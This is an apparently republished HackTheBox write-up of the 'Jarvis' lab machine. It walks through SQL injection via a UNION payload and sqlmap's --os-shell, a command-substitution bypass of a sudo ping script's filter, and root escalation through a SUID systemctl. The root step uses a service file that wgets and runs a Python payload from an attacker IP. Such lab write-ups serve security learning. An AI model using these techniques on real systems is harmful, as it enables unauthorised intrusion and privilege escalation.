Jarvis — HackTheBox Writeup

Jarvis — HackTheBox Writeup


Jarvis — HackTheBox Writeup

Jarvis was a simple and fun box. I’ll start off by finding an SQLi in one of the webpages and get a basic shell using sqlmap and then bypass a filter on a sudo file to get to the user flag. To get to the root, I’ll abuse a suid binary to obtain root shell.

Enumeration

As usual, let’s start off with a Nmap scan.

The usual ports 22 and 80 and 64999are open. Let’s run gobuster in the background to keep the enumeration going on.

80 — HTTP

We are presented with what looks like a hotel booking website.

We see that supersecurehotel.htb mentioned on the page. Maybe there’s a virtual host, let’s add it to our /etc/hosts file and see if the server responds any different.

127.0.1.1       kali
10.10.10.143    supersecurehotel.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Well, browsing to supersecurehotel.htb also directs to the same webpage.

//supersecurehotel.htb/room.php?cod=1  caught my attention. My guess was that the parameter cod is vulnerable to SQLi.

Testing with some basic SQLi, confirms that the site is indeed vulnerable to SQLi. I checked the number of columns by

//supersecurehotel.htb/room.php?cod=1%20UNION%20SELECT%201,2,3,4,5,6,7.

I fed the request to sqlmap and I tried to get a basic shell from sqlmap.

[email protected]:~/htb/boxes/jarvis# sqlmap -r room.req --batch --os-shell

Choose the default option when asked for any questions by sqlmap.
…. And it worked!

We can get a proper shell

Privesc: www-data -> pepper

We see that the user www-data has a sudo permission to run a file as pepper user.

sudo permission

This looks like some kind of an application that lets us ping someone and gives us statistics for it.

Initially I tried with simple bash substitution and looks like it Got me. I took a look at the code to see what kind of filter it has and which commands it allows.

blacklist

So, it’s filtering characters that can allow us to execute other commands. I decided to continue to poke around with bash substitution $() .

It worked!

If I remove the special characters and just run a single command it works and we see that we are running this as pepper user. Time to get shell now.

Shell as pepper

Privesc: pepper -> root

Doing some basic checks, we see that we have a SUID set on systemctl . I checked for ways to privesc with the help of systemctl .

And my goto page was //gtfobins.github.io/gtfobins/systemctl/

TF=$(mktemp).service
echo '
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"

WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

The above script is creating a service file and adding a command in the ExecStart field to run the command when the service is started. Then it is linking the service and then enabling it. An awesome to understand all about systemctl services.

I’ve tried with the above script. But it didn’t work out as expected. You can take a look at writing our own service file. This is what I’ve written. It’s a very basic service file that executes the command mentioned in ExecStart field when the service is started.


Description=Example systemd service.

Type=simple
ExecStart=/bin/bash -c "/usr/bin/wget
//10.10.14.174/rootShell.py -O /tmp/kkk.py ;/usr/bin/python /tmp/kkk.py"

WantedBy=multi-user.target

Make sure that this service file is not present in the /tmp/ folder. I was stuck here for a fair bit of a time. Then I’ve moved the service file to /home/pepper/ , it works flawlessly this time. This is what the docs say.

link FILENAME
Link a unit file that is not in the unit file search paths into the unit file search path. This requires an absolute path to a unit file. The effect of this can be undone with disable. The effect of this command is that a unit file is available for start and other commands although it is not installed directly in the unit search path.

Once the service is linked, just start the service as we would for any normal service like apache2 or docker .

rooted

Thanks for reading,
Preetham ( //twitter.com/PreethamBomma_)

Follow Infosec Write-ups for more such awesome write-ups.

InfoSec Write-ups


Jarvis — HackTheBox Writeup was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.




Jarvis — HackTheBox Writeup
InfoSec Write-ups – Medium
Source link




TAGS
Share This

COMMENTS

Wordpress (0)
Disqus ( )